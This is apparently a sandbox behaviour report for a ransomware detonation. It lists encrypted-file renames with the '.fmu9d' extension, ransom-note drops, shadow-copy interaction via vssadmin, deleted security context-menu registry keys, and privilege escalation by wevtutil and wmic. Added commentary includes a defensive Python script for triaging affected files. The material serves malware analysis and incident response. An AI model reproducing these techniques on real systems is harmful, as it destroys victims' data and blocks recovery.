File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\fr-ma\auw1_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Common Files\System\msadc\fr-FR\msdaprsr.dll.mui.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_dyaGuwabpNs0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\en-US\rtscom.dll.mui C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\ThemeCreation\Edit.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.OneConnect_2.1701.277.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\OneConnectStoreLogo.scale-100.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\Assets\PeopleLargeTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-30_altform-fullcolor.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_export_18.svg.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_xyh3bqLBoj00.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\prodicon.gif.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_DT8gmlDPxs80.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN114.XML.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_AyboSrubyHk0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]_Gx6bLA604BQ0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxCalendarAppList.targetsize-72.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\FPA_FA000000009\auw1_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\auw1_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\en-US\micaut.dll.mui C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\OutlookMailLargeTile.scale-400.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\auw1_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-lib-uihandler.xml.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_aGt355PdleY0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PROOF\msth8EN.LEX.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_uJC3zTt1R6U0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\PopUp\Pop_up_Question.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\LTR\contrast-black\MedTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Home\contrast-white\MedTile.scale-125.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\vlc.mo.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_C7Oi-IGAebA0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Buttons\GiveUp\GiveUp-up.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsAppList.targetsize-256.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\vlc.mo.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_IgiqCt1ydmI0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\7316_20x20x32.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\ja-jp\ui-strings.js.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_x_EINBwB1400.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteNotebookSmallTile.scale-400.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ca-es\ui-strings.js.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_tqc4gfHE5L80.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Common Files\System\ado\en-US\msader15.dll.mui C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-oql_zh_CN.jar.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_Rt5h0WYPiYY0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\manifestAssets\contrast-white\Icon.targetsize-48.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\GamePlayAssets\Localization\localized_ES-ES.respack C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Tournament\SampleCompetitor1.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-40_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\Images\PrintAndShare\Glyph_0xe7da.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ja-JP\IPSEventLogMsg.dll.mui C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalPipcR_OEM_Perp-ul-oob.xrm-ms.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_37CdesbNVg80.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AlarmsLargeTile.contrast-white_scale-100.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarAppList.targetsize-30.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\new_icons_retina.png.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_vzwtiMuR0L00.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\Stationery\Roses.jpg C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.xml.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_3DbSZJVAvd00.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_OEM_Perp-ul-oob.xrm-ms.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_8tTYAPgMy-w0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\Resources\GetSMDL2.ttf C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\1849_40x40x32.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-black\PeopleAppList.scale-100.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\print_poster.png.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_5sKry0KusNM0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\MSIPC\sl\auw1_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Common Files\System\msadc\es-ES\msadcer.dll.mui.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_glhD06VSBrg0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-queries.xml.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_JJUzqqHyoE40.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentR_Trial-ul-oob.xrm-ms.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_P1ttnl4oqDM0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\1250_48x48x32.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\2875_48x48x32.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-72.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\8080_36x36x32.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\2210_48x48x32.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Livetiles\MicrosoftSolitaireMedTile.scale-200.jpg C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
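
The renamed paths in this table share one structure: the original name, a dot, a 43-character token that is identical for every encrypted file in this detonation, an underscore, a 12-character token that differs per file, and the extension .fmu9d; the note auw1_HOW_TO_DECRYPT.txt is created per directory. Files that only appear as "opened for modification" under their original name (the WindowsApps PNGs above) cannot be classified from the name alone. The following is an added example, not sandbox or Hive code, that parses that structure from file events to recover original paths, count ransom-note drops, and report which original extensions were hit. The fixed token lengths are inferred from the three renamed files shown here and are an assumption; the event list is constructed from rows of this report plus one unrenamed write.

```python
"""Scope an encryption run from sandbox file events (added example, not
sandbox or Hive code). Token lengths are an assumption drawn from the three
renamed files in this report."""
import ntpath
import re
from collections import Counter

# <original>.<43-char token shared across files>_<12-char per-file token>.fmu9d
ENCRYPTED_NAME = re.compile(
    r'(?P<original>.+)\.(?P<shared>[A-Za-z0-9_-]{43})_(?P<per_file>[A-Za-z0-9_-]{12})\.fmu9d')
# The note name observed here; the "auw1_" prefix is not required by the rule.
RANSOM_NOTE = re.compile(r'_HOW_TO_DECRYPT\.txt$', re.I)

# Constructed from rows in this report; the last row is an unrenamed write that
# the sandbox logged before any rename, so it cannot be classified by name.
SAMPLE_FILE_EVENTS = [
    ("File created", r"C:\Program Files\Microsoft Office\root\Office16\MSIPC\sl\auw1_HOW_TO_DECRYPT.txt"),
    ("File opened for modification", r"C:\Program Files\Common Files\System\msadc\es-ES\msadcer.dll.mui.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_glhD06VSBrg0.fmu9d"),
    ("File opened for modification", r"C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-queries.xml.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_JJUzqqHyoE40.fmu9d"),
    ("File opened for modification", r"C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentR_Trial-ul-oob.xrm-ms.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_P1ttnl4oqDM0.fmu9d"),
    ("File opened for modification", r"C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-72.png"),
]


def parse_encrypted_name(path):
    """Split an encrypted path into original path and the two tokens, or None."""
    m = ENCRYPTED_NAME.fullmatch(path)
    if not m:
        return None
    return {"original": m.group("original"),
            "shared_token": m.group("shared"),
            "file_token": m.group("per_file")}


def triage_file_events(events):
    """Aggregate (action, path) events into an impact summary for IR scoping."""
    summary = {"encrypted": 0, "ransom_notes": 0, "unclassified_writes": 0,
               "shared_tokens": set(), "note_dirs": set(), "extensions_hit": Counter()}
    for _action, path in events:
        parsed = parse_encrypted_name(path)
        if parsed:
            summary["encrypted"] += 1
            summary["shared_tokens"].add(parsed["shared_token"])
            # ntpath handles backslash paths on any host OS.
            summary["extensions_hit"][ntpath.splitext(parsed["original"])[1].lower()] += 1
        elif RANSOM_NOTE.search(ntpath.basename(path)):
            summary["ransom_notes"] += 1
            summary["note_dirs"].add(ntpath.dirname(path))
        else:
            summary["unclassified_writes"] += 1
    summary["shared_tokens"] = sorted(summary["shared_tokens"])
    summary["note_dirs"] = sorted(summary["note_dirs"])
    return summary


if __name__ == "__main__":
    s = triage_file_events(SAMPLE_FILE_EVENTS)
    print(f"encrypted={s['encrypted']} notes={s['ransom_notes']} "
          f"unclassified={s['unclassified_writes']} tokens={s['shared_tokens']}")
    print(dict(s["extensions_hit"]))
```

More than one shared token across a host's events would mean more than one encryption run, which is why the summary keeps them as a set. Forty-three unpadded base64 characters is the encoded length of 32 bytes, an observation that is consistent with, but does not prove, an encoded key identifier; the example makes no claim about what the tokens contain.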

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP C:\Windows\SysWOW64\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP C:\Windows\SysWOW64\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP C:\Windows\SysWOW64\reg.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
